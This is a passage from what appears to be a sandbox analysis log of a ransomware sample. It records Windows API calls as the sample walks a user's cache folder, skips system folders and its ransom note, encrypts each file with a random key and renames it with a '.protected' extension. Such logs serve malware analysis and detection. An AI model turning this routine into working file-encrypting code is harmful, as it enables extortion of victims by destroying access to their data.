lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.498] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.498] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.498] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.498] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.499] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, 
lpOverlapped=0x0) returned 1 [0088.499] CloseHandle (hObject=0x150) returned 1 [0088.499] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.protected") returned 161 [0088.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.protected")) returned 1 [0088.500] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.500] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Windows") returned -1 [0088.500] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Program Files") returned -1 [0088.500] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Program Files (x86)") returned -1 [0088.500] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="$Recycle.bin") returned 1 [0088.500] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="System Volume Information") returned -1 [0088.500] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 151 [0088.500] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".protected") returned 0x0 [0088.500] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="RESTORE_FILES.txt") returned -1 [0088.500] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.500] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 151 [0088.501] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".txt") returned 0x0 [0088.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 151 [0088.502] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", 
lpSrch=".rar") returned 0x0 [0088.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 151 [0088.502] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".zip") returned 0x0 [0088.502] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.502] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.502] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.503] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.503] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.503] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.503] CloseHandle (hObject=0x150) returned 1 [0088.503] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.protected") returned 161 [0088.503] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.protected")) returned 1 [0088.504] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.504] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Windows") returned -1 [0088.504] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Program Files") returned -1 [0088.504] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Program Files (x86)") returned -1 [0088.504] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="$Recycle.bin") returned 1 [0088.504] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="System Volume Information") returned -1 [0088.504] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 151 [0088.504] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".protected") returned 0x0 [0088.504] lstrcmpW 
(lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="RESTORE_FILES.txt") returned -1 [0088.504] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.504] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 151 [0088.506] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".txt") returned 0x0 [0088.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 151 [0088.506] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".rar") returned 0x0 [0088.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 151 [0088.506] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".zip") returned 0x0 [0088.506] ReadFile (in: 
hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.507] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.507] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.507] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.507] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.507] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.507] CloseHandle (hObject=0x150) returned 1 [0088.508] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.protected") returned 161 [0088.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.protected")) returned 1 [0088.509] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.509] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Windows") returned -1 [0088.509] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Program Files") returned -1 [0088.509] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Program Files (x86)") returned -1 [0088.509] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="$Recycle.bin") returned 1 [0088.509] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="System Volume Information") returned -1 [0088.509] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 151 [0088.509] StrStrIW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".protected") returned 0x0 [0088.509] lstrcmpW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="RESTORE_FILES.txt") returned -1 [0088.509] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.509] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0088.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 151 [0088.509] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".txt") returned 0x0 [0088.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 151 [0088.509] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".rar") returned 0x0 [0088.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 151 [0088.510] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".zip") returned 0x0 [0088.510] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x56e, lpOverlapped=0x0) returned 1 [0088.549] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa92, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.549] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x56e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x56e, lpOverlapped=0x0) returned 1 [0088.550] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.550] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.550] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.550] CloseHandle (hObject=0x150) returned 1 [0088.550] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.protected") returned 161 [0088.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.protected")) returned 1 [0088.551] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0088.551] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Windows") returned -1 [0088.551] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Program Files") returned -1 [0088.551] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Program Files (x86)") returned -1 [0088.551] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="$Recycle.bin") returned 1 [0088.551] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="System Volume Information") returned -1 [0088.551] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 151 [0088.551] StrStrIW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".protected") returned 0x0 [0088.551] lstrcmpW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="RESTORE_FILES.txt") returned -1 [0088.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 151 [0088.552] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".txt") returned 0x0 [0088.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 151 [0088.552] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".rar") returned 0x0 [0088.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 151 [0088.552] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".zip") returned 0x0 [0088.552] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.553] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.553] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.553] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.553] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.553] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.553] CloseHandle (hObject=0x150) returned 1 [0088.553] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.protected") returned 161 [0088.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 